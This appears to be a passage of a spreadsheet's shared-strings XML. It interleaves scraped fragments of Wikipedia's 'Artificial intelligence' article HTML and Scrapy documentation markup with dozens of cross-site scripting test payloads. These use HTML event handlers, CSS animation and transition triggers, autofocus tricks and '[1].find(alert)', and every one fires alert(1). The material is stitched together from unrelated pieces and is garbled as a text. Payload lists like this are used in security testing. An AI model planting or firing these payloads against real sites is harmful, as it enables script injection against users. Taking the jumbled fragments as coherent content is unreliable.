    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFHernandez-Orallo2000"&gt;Hernandez-Orallo 2000 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;span class="mw-headline" id="General_intelligence"&gt;General intelligence </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Real-time_computing" title="Real-time computing"&gt;Real-time computing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;var onpointerleave=alert(1)&gt;XSS&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onmouseenter="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;dir id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;dl onbeforecopy="alert(1)" contenteditable&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2016 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.artint.2010.09.006"&gt;10.1016/j.artint.2010.09.006 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Artificial+Intelligence&amp;amp;rft.atitle=Measuring+Universal+Intelligence%3A+Towards+an+Anytime+Intelligence+Test&amp;amp;rft.volume=174&amp;amp;rft.issue=18&amp;amp;rft.pages=1508-1539&amp;amp;rft.date=2010&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.295.9079&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.artint.2010.09.006&amp;amp;rft.aulast=Hernandez-Orallo&amp;amp;rft.aufirst=J.&amp;amp;rft.au=Dowe%2C+D.+L.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;param onmousemove="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;var onpointerup=alert(1)&gt;XSS&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onmousedown="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;rb draggable="true" ondragleave="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Cyc" title="Cyc"&gt;Cyc &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;data draggable="true" ondragenter="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Hegemony_of_the_Dartmouth_conference_attendees-33"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Hegemony_of_the_Dartmouth_conference_attendees_33-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Applied_information_economics" title="Applied information economics"&gt;Information value theory &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Larry_Laudan" title="Larry Laudan"&gt;Larry Laudan &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;mark id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/mark&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;param id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;link onblur=alert(1) tabindex=1 id=x&gt;&lt;/link&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;legend onload=alert(1)&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;div class="after-portlet after-portlet-lang"&gt;&lt;span class="wb-langlinks-edit wb-langlinks-link"&gt;&lt;a href="https://www.wikidata.org/wiki/Special:EntityPage/Q11660#sitelinks-wikipedia" title="Edit interlanguage links" class="wbc-editpage"&gt;Edit links &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;textarea id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;object onpointerleave=alert(1)&gt;XSS&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/basefont&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNewquist1994"&gt;Newquist 1994 &lt;/a&gt;, pp.&amp;#160;301–318 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/sup&gt; possibly involving &lt;a href="/wiki/Reinforcement_learning#Inverse_reinforcement_learning" title="Reinforcement learning"&gt;inverse reinforcement learning &lt;/a&gt;.&lt;sup id="cite_ref-HC_369-1" class="reference"&gt;&lt;a href="#cite_note-HC-369"&gt;&amp;#91;358&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup class="reference" style="white-space:nowrap;"&gt;:&lt;span&gt;191-193 </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Adam_Tooze" title="Adam Tooze"&gt;Tooze, Adam &lt;/a&gt;, "Democracy and Its Discontents", &lt;i&gt;&lt;a href="/wiki/The_New_York_Review_of_Books" title="The New York Review of Books"&gt;The New York Review of Books &lt;/a&gt; &lt;/i&gt;, vol. LXVI, no. 10 (6 June 2019), pp.&amp;#160;52–53, 56–57.  "Democracy has no clear answer for the mindless operation of &lt;a href="/wiki/Bureaucracy" title="Bureaucracy"&gt;bureaucratic &lt;/a&gt; and &lt;a href="/wiki/Technology" title="Technology"&gt;technological power &lt;/a&gt;.  We may indeed be witnessing its extension in the form of artificial intelligence and &lt;a href="/wiki/Robotics" title="Robotics"&gt;robotics &lt;/a&gt;.  Likewise, after decades of dire warning, the &lt;a href="/wiki/Environmentalism" title="Environmentalism"&gt;environmental problem &lt;/a&gt; remains fundamentally unaddressed.... Bureaucratic overreach and environmental catastrophe are precisely the kinds of slow-moving existential challenges that democracies deal with very badly.... Finally, there is the threat du jour:  &lt;a href="/wiki/Corporation" title="Corporation"&gt;corporations &lt;/a&gt; and the technologies they promote."  (pp.&amp;#160;56–57.) &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;kbd id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;tt onkeypress="alert(1)" contenteditable&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>[1].find(alert)</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:%C3%84%C3%A4retuvastuse_n%C3%A4ide.png" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/2/20/%C3%84%C3%A4retuvastuse_n%C3%A4ide.png/220px-%C3%84%C3%A4retuvastuse_n%C3%A4ide.png" decoding="async" width="220" height="73" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/2/20/%C3%84%C3%A4retuvastuse_n%C3%A4ide.png/330px-%C3%84%C3%A4retuvastuse_n%C3%A4ide.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/2/20/%C3%84%C3%A4retuvastuse_n%C3%A4ide.png/440px-%C3%84%C3%A4retuvastuse_n%C3%A4ide.png 2x" data-file-width="1415" data-file-height="471" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;In 2011, a &lt;i&gt;&lt;a href="/wiki/Jeopardy!" title="Jeopardy!"&gt;Jeopardy! &lt;/a&gt; &lt;/i&gt; &lt;a href="/wiki/Quiz_show" class="mw-redirect" title="Quiz show"&gt;quiz show &lt;/a&gt; exhibition match, &lt;a href="/wiki/IBM" title="IBM"&gt;IBM &lt;/a&gt;'s &lt;a href="/wiki/Question_answering_system" class="mw-redirect" title="Question answering system"&gt;question answering system &lt;/a&gt;, &lt;a href="/wiki/Watson_(artificial_intelligence_software)" class="mw-redirect" title="Watson (artificial intelligence software)"&gt;Watson &lt;/a&gt;, defeated the two greatest &lt;i&gt;Jeopardy! &lt;/i&gt; champions, &lt;a href="/wiki/Brad_Rutter" title="Brad Rutter"&gt;Brad Rutter &lt;/a&gt; and &lt;a href="/wiki/Ken_Jennings" title="Ken Jennings"&gt;Ken Jennings &lt;/a&gt;, by a significant margin.&lt;sup id="cite_ref-FOOTNOTEMarkoff2011_45-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEMarkoff2011-45"&gt;&amp;#91;45&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Moore%27s_law" title="Moore&amp;#39;s law"&gt;Faster computers &lt;/a&gt;, algorithmic improvements, and access to &lt;a href="/wiki/Big_data" title="Big data"&gt;large amounts of data &lt;/a&gt; enabled advances in &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;machine learning &lt;/a&gt; and perception; data-hungry &lt;a href="/wiki/Deep_learning" title="Deep learning"&gt;deep learning &lt;/a&gt; methods started to dominate accuracy benchmarks &lt;a href="/wiki/Deep_learning#Deep_learning_revolution" title="Deep learning"&gt;around 2012 &lt;/a&gt;.&lt;sup id="cite_ref-46" class="reference"&gt;&lt;a href="#cite_note-46"&gt;&amp;#91;46&amp;#93; &lt;/a&gt; &lt;/sup&gt; The &lt;a href="/wiki/Kinect" title="Kinect"&gt;Kinect &lt;/a&gt;, which provides a 3D body–motion interface for the &lt;a href="/wiki/Xbox_360" title="Xbox 360"&gt;Xbox 360 &lt;/a&gt; and the &lt;a href="/wiki/Xbox_One" title="Xbox One"&gt;Xbox One &lt;/a&gt;, uses algorithms that emerged from lengthy AI research&lt;sup id="cite_ref-47" class="reference"&gt;&lt;a href="#cite_note-47"&gt;&amp;#91;47&amp;#93; &lt;/a&gt; &lt;/sup&gt; as do &lt;a href="/wiki/Intelligent_personal_assistant" class="mw-redirect" title="Intelligent personal assistant"&gt;intelligent personal assistants &lt;/a&gt; in &lt;a href="/wiki/Smartphone" title="Smartphone"&gt;smartphones &lt;/a&gt;.&lt;sup id="cite_ref-48" class="reference"&gt;&lt;a href="#cite_note-48"&gt;&amp;#91;48&amp;#93; &lt;/a&gt; &lt;/sup&gt; In March 2016, &lt;a href="/wiki/AlphaGo" title="AlphaGo"&gt;AlphaGo &lt;/a&gt; won 4 out of 5 games of &lt;a href="/wiki/Go_(game)" title="Go (game)"&gt;Go &lt;/a&gt; in a match with Go champion &lt;a href="/wiki/Lee_Sedol" title="Lee Sedol"&gt;Lee Sedol &lt;/a&gt;, becoming the first &lt;a href="/wiki/Computer_Go" title="Computer Go"&gt;computer Go-playing system &lt;/a&gt; to beat a professional Go player without &lt;a href="/wiki/Go_handicaps" class="mw-redirect" title="Go handicaps"&gt;handicaps &lt;/a&gt;.&lt;sup id="cite_ref-bbc-alphago_8-1" class="reference"&gt;&lt;a href="#cite_note-bbc-alphago-8"&gt;&amp;#91;8&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-49" class="reference"&gt;&lt;a href="#cite_note-49"&gt;&amp;#91;49&amp;#93; &lt;/a&gt; &lt;/sup&gt; In the 2017 &lt;a href="/wiki/Future_of_Go_Summit" title="Future of Go Summit"&gt;Future of Go Summit &lt;/a&gt;, &lt;a href="/wiki/AlphaGo" title="AlphaGo"&gt;AlphaGo &lt;/a&gt; won a &lt;a href="/wiki/AlphaGo_versus_Ke_Jie" title="AlphaGo versus Ke Jie"&gt;three-game match &lt;/a&gt; with &lt;a href="/wiki/Ke_Jie" title="Ke Jie"&gt;Ke Jie &lt;/a&gt;,&lt;sup id="cite_ref-50" class="reference"&gt;&lt;a href="#cite_note-50"&gt;&amp;#91;50&amp;#93; &lt;/a&gt; &lt;/sup&gt; who at the time continuously held the world No. 1 ranking for two years.&lt;sup id="cite_ref-51" class="reference"&gt;&lt;a href="#cite_note-51"&gt;&amp;#91;51&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-52" class="reference"&gt;&lt;a href="#cite_note-52"&gt;&amp;#91;52&amp;#93; &lt;/a&gt; &lt;/sup&gt; This marked the completion of a significant milestone in the development of Artificial Intelligence as Go is a relatively complex game, more so than Chess.</t>
  </si>
  <si>
    <t>&lt;time onblur=alert(1) tabindex=1 id=x&gt;&lt;/time&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;template ondrop=alert(1) contenteditable&gt;drop here&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;28 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 19.4 &amp;amp; 7 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;object onpointerup=alert(1)&gt;XSS&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;menu onload=alert(1)&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;rt draggable="true" ondragenter="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/rtc&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;pre onmouseleave="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;col id=x tabindex=1 onactivate=alert(1)&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;p id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;samp ondragover=alert(1) contenteditable&gt;drop here&lt;/samp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Learning"&gt;Learning </t>
  </si>
  <si>
    <t>&lt;nextid onclick="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Space_probe" title="Space probe"&gt;Space probe &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ins onkeyup="alert(1)" contenteditable&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;ins style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/2.0/"&gt;2.0&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;dl onmouseout="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Emerging_technologies_in_information_and_communications" style="font-size:114%;margin:0 4em"&gt;&lt;a href="/wiki/Emerging_technologies" title="Emerging technologies"&gt;Emerging technologies &lt;/a&gt; in &lt;a href="/wiki/Information_and_communications_technology" title="Information and communications technology"&gt;information and communications &lt;/a&gt; &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td colspan="2" class="navbox-list navbox-odd" style="width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;command onmouseleave="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;Input value = "" type = text&gt;</t>
  </si>
  <si>
    <t>&lt;h1 id=x tabindex=1 onactivate=alert(1)&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Natural_language_processing" title="Natural language processing"&gt;Natural language processing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;form onmousedown="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Alexey_Lyapunov" title="Alexey Lyapunov"&gt;Alexey Lyapunov &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;spacer draggable="true" ondrag="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;em onclick="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Otto_Neurath" title="Otto Neurath"&gt;Otto Neurath &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;rtc style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Networking_hardware" title="Networking hardware"&gt;Network components &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/tr&gt;&lt;tr&gt;&lt;th style="padding:0.1em"&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/bgsound&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onkeyup="alert(1)" contenteditable&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;embed ondragover=alert(1) contenteditable&gt;drop here&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;code onmouseout="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Allen, Gregory (6 February 2019). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20190317004017/https://www.cnas.org/publications/reports/understanding-chinas-ai-strategy"&gt;"Understanding China's AI Strategy" &lt;/a&gt;. &lt;i&gt;www.cnas.org/publications/reports/understanding-chinas-ai-strategy &lt;/i&gt;. Center for a New American Security. Archived from &lt;a rel="nofollow" class="external text" href="https://www.cnas.org/publications/reports/understanding-chinas-ai-strategy"&gt;the original &lt;/a&gt; on 17 March 2019&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;17 March </t>
  </si>
  <si>
    <t>&lt;option onpointerout=alert(1)&gt;XSS&lt;/option&gt;</t>
  </si>
  <si>
    <t>won many visual pattern recognition competitions.&lt;sup id="cite_ref-schmidhuber2015_246-2" class="reference"&gt;&lt;a href="#cite_note-schmidhuber2015-246"&gt;&amp;#91;235&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;17–25 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;rt onpointerout=alert(1)&gt;XSS&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;q onmouseenter="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;div class="toctree-wrapper compound"&gt;</t>
  </si>
  <si>
    <t>&lt;element onbeforecopy="alert(1)" contenteditable&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="intro/examples.html"&gt;Examples&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Printed_circuit_board" title="Printed circuit board"&gt;Printed circuit board &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;main style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;base id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;acronym id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;b onmouseout="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;acronym draggable="true" ondrag="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Evolutionary_computation" title="Template:Evolutionary computation"&gt;&lt;abbr title="View this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Evolutionary_computation" title="Template talk:Evolutionary computation"&gt;&lt;abbr title="Discuss this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Evolutionary_computation&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;nav data-toggle="wy-nav-shift" class="wy-nav-side"&gt;</t>
  </si>
  <si>
    <t>&lt;small draggable="true" ondragend="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;ul onpointermove=alert(1)&gt;XSS&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;ol onpointerenter=alert(1)&gt;XSS&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;link onbeforecopy="alert(1)" contenteditable&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;html onbeforecut="alert(1)" contenteditable&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;video autoplay controls onseeking=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;i onmouseup="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;title onpointerup=alert(1)&gt;XSS&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;select onchange=alert(1)&gt;&lt;option&gt;change me&lt;/option&gt;&lt;option&gt;XSS&lt;/option&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t>Historical influence and philosophical implications:</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;dialog style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;del onbeforepaste="alert(1)" contenteditable&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;b id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;textarea autofocus onfocus=alert(1)&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;bdo ondblclick="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Understand what Scrapy is and how it can help you.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;thead id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onblur=alert(1) tabindex=1 id=x&gt;&lt;/dfn&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;section id=x tabindex=1 onfocus=alert(1)&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;details ontoggle=alert(1) open&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;element onpointerleave=alert(1)&gt;XSS&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="contributing.html"&gt;Contributing to Scrapy&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;form onpointerenter=alert(1)&gt;XSS&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onpointerout=alert(1)&gt;XSS&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;u id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/commands.html"&gt;&lt;span class="doc"&gt;Command line tool</t>
  </si>
  <si>
    <t>&lt;button onfocusout=alert(1) id=x&gt;&lt;/button&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;small id=x tabindex=1 onactivate=alert(1)&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t>Definition of AI as the study of &lt;a href="/wiki/Intelligent_agents" class="mw-redirect" title="Intelligent agents"&gt;intelligent agents &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;video id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;video onbeforepaste="alert(1)" contenteditable&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;rb style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;link rel="stylesheet" href="_static/css/tooltipster.bundle.min.css" type="text/css" /&gt;</t>
  </si>
  <si>
    <t>&lt;rtc oncontextmenu="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onpointermove=alert(1)&gt;XSS&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Modeling_language" title="Modeling language"&gt;Modeling language &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/developer-tools.html"&gt;&lt;span class="doc"&gt;Using your browser’s Developer Tools for scraping</t>
  </si>
  <si>
    <t>&lt;discard onpointerenter=alert(1)&gt;XSS&lt;/discard&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/kbd&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;rp onmousemove="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Future_of_Humanity_Institute" title="Future of Humanity Institute"&gt;Future of Humanity Institute &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Materialism" title="Materialism"&gt;Materialism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;image onmouseup="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;address style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Gödel_himself-356"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Gödel_himself_356-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;a id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/a&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dt onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/dt&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
